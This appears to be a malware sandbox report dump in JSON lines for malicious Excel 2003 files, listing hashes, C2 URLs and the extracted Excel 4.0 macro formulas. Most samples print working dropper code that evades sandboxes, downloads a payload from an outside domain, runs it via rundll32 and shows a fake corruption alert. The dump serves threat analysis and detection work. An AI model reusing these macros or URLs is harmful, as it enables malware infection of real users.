{"version":"0.2","sample":{"sample":"","kind":"file","target":"8a5d756694ad5171df83731e51d59f7d0de9553d5541d4a3c68961dcea326330"},"analysis":{"reported":"2020-04-09T16:17:32Z","score":10},"files":[{"filename":"8a5d756694ad5171df83731e51d59f7d0de9553d5541d4a3c68961dcea326330","filesize":113664,"md5":"5ee5ba2852c27c7780ca7453b0918890","sha1":"93ca63d8d73c8b6010a5148882b2a7d4126f18cd","sha256":"8a5d756694ad5171df83731e51d59f7d0de9553d5541d4a3c68961dcea326330","sha512":"221a967dbb26bd3d6f131bc0f1fe5c2c374c239c81d1076dae60c2fb7577bb3ac4ec5c0415ebe0137a96043b3e1d652474b3e2f2dde45ae4bacb6c2ea7de7e93","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8a5d756694ad5171df83731e51d59f7d0de9553d5541d4a3c68961dcea326330.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"GAoIU07yoh\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8a626229d63419b375e523395d5a21d4882b0ba1bd724c55689245a59f16e453"},"analysis":{"reported":"2020-04-09T16:17:32Z","score":10},"files":[{"filename":"8a626229d63419b375e523395d5a21d4882b0ba1bd724c55689245a59f16e453","filesize":167936,"md5":"498294e3e268502c78648ffe7084760e","sha1":"cd421f1a4b69b85def858d3fea5930534f8f8705","sha256":"8a626229d63419b375e523395d5a21d4882b0ba1bd724c55689245a59f16e453","sha512":"4aae48cb941dc3f7fec788c94515f1fafa8407925e6a1e29ae65ac2dd69babe9178327f943ad0ab11035c29cf2ba5f6ef1d75b853f1423c98565361626b42c4d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8a626229d63419b375e523395d5a21d4882b0ba1bd724c55689245a59f16e453.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"xeDA8KuP06\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8a65226e5b752002e8afeb6bb8030d863b7e395fde48870dd164c29cc51357c0"},"analysis":{"reported":"2020-04-09T16:17:32Z","score":10},"files":[{"filename":"8a65226e5b752002e8afeb6bb8030d863b7e395fde48870dd164c29cc51357c0","filesize":185344,"md5":"0fb9cdb3383c42fd54f6c45ee4089c43","sha1":"0d03291db11d2cb216726213ff820369d0bfd588","sha256":"8a65226e5b752002e8afeb6bb8030d863b7e395fde48870dd164c29cc51357c0","sha512":"ec9ce6545e367bb8db2cf45c8b1e9305f9c477452793182046406b69b6dc92499576c2f5b14b017be40307c72077e2bd2c8619057f38085a2e8ab84011a2ca32","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8a65226e5b752002e8afeb6bb8030d863b7e395fde48870dd164c29cc51357c0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8a7704249f0cb218536e0fdc13a07d68b2925ec1566d2f189062a0f405823a86"},"analysis":{"reported":"2020-04-09T16:17:32Z","score":10},"files":[{"filename":"8a7704249f0cb218536e0fdc13a07d68b2925ec1566d2f189062a0f405823a86","filesize":226304,"md5":"9153c65920371b817a7d444e68d1e8b1","sha1":"d3c42ef0e15eef516b730d2d83d8a714bd08c500","sha256":"8a7704249f0cb218536e0fdc13a07d68b2925ec1566d2f189062a0f405823a86","sha512":"9e5c33857e44f7e1a364b1ac727c1875ed7e6f61de0683a2e53f33dea99f4f95434e50eaf07d6bf5b33170d52eaf1f9588c7941e849b09010207b2f2a5c4b3cf","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8a7704249f0cb218536e0fdc13a07d68b2925ec1566d2f189062a0f405823a86.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ddfspwxrb.club/fb2g424g"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"TFY3XiOAev\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8a7fcc3f06e05d7c372b493bf1cc7e5ab87e407999c57ec712006b1037589699"},"analysis":{"reported":"2020-04-09T16:17:32Z","score":10},"files":[{"filename":"8a7fcc3f06e05d7c372b493bf1cc7e5ab87e407999c57ec712006b1037589699","filesize":206336,"md5":"d206dd979b9b34368fa96a376f02b940","sha1":"b8310d16bb466326ade33644ab632f9223dcba8e","sha256":"8a7fcc3f06e05d7c372b493bf1cc7e5ab87e407999c57ec712006b1037589699","sha512":"25a043a00e068a4f15cec993b10c0d9202ad687ddd8938dc8f888aef050652292546f6336728b47e246a60161371f008b028d798a272a71307e2579ccc788b11","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8a7fcc3f06e05d7c372b493bf1cc7e5ab87e407999c57ec712006b1037589699.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"WSQ7co8NtV\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8a83d59c67d6705039ae3645e924419a30c5837f20d86b2974267537da3a395d"},"analysis":{"reported":"2020-04-09T16:17:32Z","score":10},"files":[{"filename":"8a83d59c67d6705039ae3645e924419a30c5837f20d86b2974267537da3a395d","filesize":112128,"md5":"5901d2fecc73753021deb41bf6165625","sha1":"41e835ada1f2d11ddf255ccc27da9d5d95aca21c","sha256":"8a83d59c67d6705039ae3645e924419a30c5837f20d86b2974267537da3a395d","sha512":"9e1f4a263b712498ef798bff88b4fbfab03b74495009c95b54f961497fb6965f9b2b5055a33d4c4087d6e4934e5ed8e4fc224d46bed1b27c040d2b7176b14e22","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8a83d59c67d6705039ae3645e924419a30c5837f20d86b2974267537da3a395d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8a9f3e0fae7c1715795570b84f53c4057ab01fc5b549d7beed3293384ccd9642"},"analysis":{"reported":"2020-04-09T16:17:32Z","score":10},"files":[{"filename":"8a9f3e0fae7c1715795570b84f53c4057ab01fc5b549d7beed3293384ccd9642","filesize":120320,"md5":"b3ab8c0a7d522a27f7e7fffa7bb6a9aa","sha1":"8dd7b53bc5e8dd32440550a6537f8f34e1fcb5df","sha256":"8a9f3e0fae7c1715795570b84f53c4057ab01fc5b549d7beed3293384ccd9642","sha512":"b31b40477a95881c9df59241511c8da11a4a26c53a66db072aa9b83bf29f61d2051a9ccd3f3c0bdb24ed6730cdfc8bb3e1069d3cdc250290688791f95bc28737","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8a9f3e0fae7c1715795570b84f53c4057ab01fc5b549d7beed3293384ccd9642.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rosannahtacey.xyz/vg43"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rosannahtacey.xyz/vg43\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"FN76LubFfK\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8aa2e147839f905836a8e8aea7ddeb0b0d6fe54e9a28f873db0f2bb275da32fc"},"analysis":{"reported":"2020-04-09T16:17:32Z","score":10},"files":[{"filename":"8aa2e147839f905836a8e8aea7ddeb0b0d6fe54e9a28f873db0f2bb275da32fc","filesize":145408,"md5":"6624276f82004ed6a2aad10fee1cbb54","sha1":"5f67f6aa0722921b35b00798c6c5e346be263b02","sha256":"8aa2e147839f905836a8e8aea7ddeb0b0d6fe54e9a28f873db0f2bb275da32fc","sha512":"f164bf9134867697e8126da9141c5ba9088b0c5b28c35a9b9444894d127b99e3c01061c394cdcba6d281af840aed5a6117f8bb82f8f19b873c3340cf7694def7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8aa2e147839f905836a8e8aea7ddeb0b0d6fe54e9a28f873db0f2bb275da32fc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://studyshine.in/wp-cryn.php","https://arturkauf.pl/wp-cryn.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://studyshine.in/wp-cryn.php\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://arturkauf.pl/wp-cryn.php\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"gtmJfNDOP4\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8aac05b018e357886249243e68955855da9fe911670ed67f4dc9575214cb105b"},"analysis":{"reported":"2020-04-09T16:17:32Z","score":10},"files":[{"filename":"8aac05b018e357886249243e68955855da9fe911670ed67f4dc9575214cb105b","filesize":170496,"md5":"3df0b55dd47b7db216231bf15b10ce11","sha1":"ecb965fde6ab30fd794b572cc560b56a2dbb7997","sha256":"8aac05b018e357886249243e68955855da9fe911670ed67f4dc9575214cb105b","sha512":"a435b677930d0869c3ce087f383a9317f7802b8b9d27f034bf8b3927e1a8209c1c97db9036f5b7931114e2d4ba3e54da8ab3f6d1779887557d6d2bc381a2f3b2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8aac05b018e357886249243e68955855da9fe911670ed67f4dc9575214cb105b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"i6fIragrue\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8aad56dddda78664099269f4bfe0ed0b46deba691a5c2c96358dfbd049133875"},"analysis":{"reported":"2020-04-09T16:17:32Z","score":10},"files":[{"filename":"8aad56dddda78664099269f4bfe0ed0b46deba691a5c2c96358dfbd049133875","filesize":167936,"md5":"c306f08838f8286b519a1b152ebfe4e8","sha1":"3d0ce24dd4982c3349a3f51b0f64535e772014f9","sha256":"8aad56dddda78664099269f4bfe0ed0b46deba691a5c2c96358dfbd049133875","sha512":"4aa5a8d96211194dc3839c0db9a1adb27f6abb4821b9e60ec82beed42763d378f2c55485e7cc254b2fd415328dfea3750ce5ed407d80c89d51ed591585dc66fb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8aad56dddda78664099269f4bfe0ed0b46deba691a5c2c96358dfbd049133875.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Il5kUEMmn9\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8ab0aaa607e4b3cc1330a0d8a14accfc9ee7d939417e6b3dc2127c1be7aabf7a"},"analysis":{"reported":"2020-04-09T16:17:33Z","score":10},"files":[{"filename":"8ab0aaa607e4b3cc1330a0d8a14accfc9ee7d939417e6b3dc2127c1be7aabf7a","filesize":221184,"md5":"bbee434a813b6adac1205a083993a885","sha1":"8964a54291d0604eba5bc6c67367540d217334c5","sha256":"8ab0aaa607e4b3cc1330a0d8a14accfc9ee7d939417e6b3dc2127c1be7aabf7a","sha512":"24d68f74c057c05c36569b42c9802a56326b3d685442fc1461beefab7f140c35456899fbd15960ec25d25ce050974c9179554b11a1b34fde90287c384a77f116","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8ab0aaa607e4b3cc1330a0d8a14accfc9ee7d939417e6b3dc2127c1be7aabf7a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://efbzfyvsb.website/f2f23"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-4]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ZC7PuOnUGi\",TRUE)\nGOTO(R$3C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8adebee081aa74b6691bd496f713a0fe4a9e53c98a225218725a144db8e3d5f1"},"analysis":{"reported":"2020-04-09T16:17:33Z","score":10},"files":[{"filename":"8adebee081aa74b6691bd496f713a0fe4a9e53c98a225218725a144db8e3d5f1","filesize":185344,"md5":"645139ce0a3e5d36c0a378a3ec585cbe","sha1":"decb859bee76671e63eda1e7965642a437e1fdd0","sha256":"8adebee081aa74b6691bd496f713a0fe4a9e53c98a225218725a144db8e3d5f1","sha512":"847799270d482b9fb4102d314c754ca3fec683a0b16d87ea45ad8e8ac048d6fd1d773725544c4f2682d6dec4daa949b5175b677f2fd412e787c785f86fb3ca3a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8adebee081aa74b6691bd496f713a0fe4a9e53c98a225218725a144db8e3d5f1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8b040d84b6be26f34232952e84afc6d18402f9eb2e5d7591dd86f3ddce41e34a"},"analysis":{"reported":"2020-04-09T16:17:33Z","score":10},"files":[{"filename":"8b040d84b6be26f34232952e84afc6d18402f9eb2e5d7591dd86f3ddce41e34a","filesize":46080,"md5":"cc69f54e9e3f1fe1f7c1207d8250e2fb","sha1":"3c6d58e0960b34f68e96bed602c3d04623b99282","sha256":"8b040d84b6be26f34232952e84afc6d18402f9eb2e5d7591dd86f3ddce41e34a","sha512":"8e239241e192a4e83654cc56be8846ad2b4b8f088bcd1b7936ed18f4d03f89a87baad05173e5e19e52c6d1c7facac5300bb421ed1844cdd3bc34bdd398d0a3b8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8b040d84b6be26f34232952e84afc6d18402f9eb2e5d7591dd86f3ddce41e34a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"SUM(R$7C$3,R$7C$5,R$7C$7)\nSUM(R$8C$3,R$8C$5,R$8C$7)\nSUM(R$11C$3,R$11C$5,R$11C$7)\nSUM(R$12C$3,R$12C$5,R$12C$7)\nSUM(R$15C$3,R$15C$5,R$15C$7)\nSUM(R$18C$3,R$18C$5,R$18C$7)\nSUM(R$21C$3,R$21C$5,R$21C$7)\nSUM(R$24C$3,R$24C$5,R$24C$7)\nSUM(R$27C$3,R$27C$5,R$27C$7)\nSUM(R$29C$3,R$29C$5,R$29C$7)\nSUM(R$31C$3,R$31C$5,R$31C$7)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8b07aa90bee1f61d8ea13ad1780df57a86cb5d20cb00f563cd7a7c97d515413b"},"analysis":{"reported":"2020-04-09T16:17:33Z","score":10},"files":[{"filename":"8b07aa90bee1f61d8ea13ad1780df57a86cb5d20cb00f563cd7a7c97d515413b","filesize":185344,"md5":"a53e0eca127f6ee0c1073ad3575050d4","sha1":"386be25c7f1ff4bb118e8edec36a524a27f7d39a","sha256":"8b07aa90bee1f61d8ea13ad1780df57a86cb5d20cb00f563cd7a7c97d515413b","sha512":"0a71e0bba285e3dcae494f46e89ec9e61214ba2d6dfbd4d3f6c03bdb3e0a7a5753ee2676360b25366cd4272f816688243359a28179d6dd45e4d4d436a2142514","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8b07aa90bee1f61d8ea13ad1780df57a86cb5d20cb00f563cd7a7c97d515413b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8b090f7cda2419f6f1463ceb2d7c95d81fe5e1b0d8cc220dabd1b7ef4d0b425b"},"analysis":{"reported":"2020-04-09T16:17:33Z","score":10},"files":[{"filename":"8b090f7cda2419f6f1463ceb2d7c95d81fe5e1b0d8cc220dabd1b7ef4d0b425b","filesize":116224,"md5":"f9f6ec2012dd08d49f88ca731475bf37","sha1":"8b3f48d9d5a3c40db52f1832412b106921145688","sha256":"8b090f7cda2419f6f1463ceb2d7c95d81fe5e1b0d8cc220dabd1b7ef4d0b425b","sha512":"3200ace3d345c475aec47fc18001c6bc28e15c8ddd17ba519217e4b76b82c0a0a6c5c7ea3620791265226a6231dbf45085cc2b669284f860be1b402a0885b6b7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8b090f7cda2419f6f1463ceb2d7c95d81fe5e1b0d8cc220dabd1b7ef4d0b425b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"yvb8moWAVF\",TRUE)\nGOTO(R$1C$10)"}}}]}
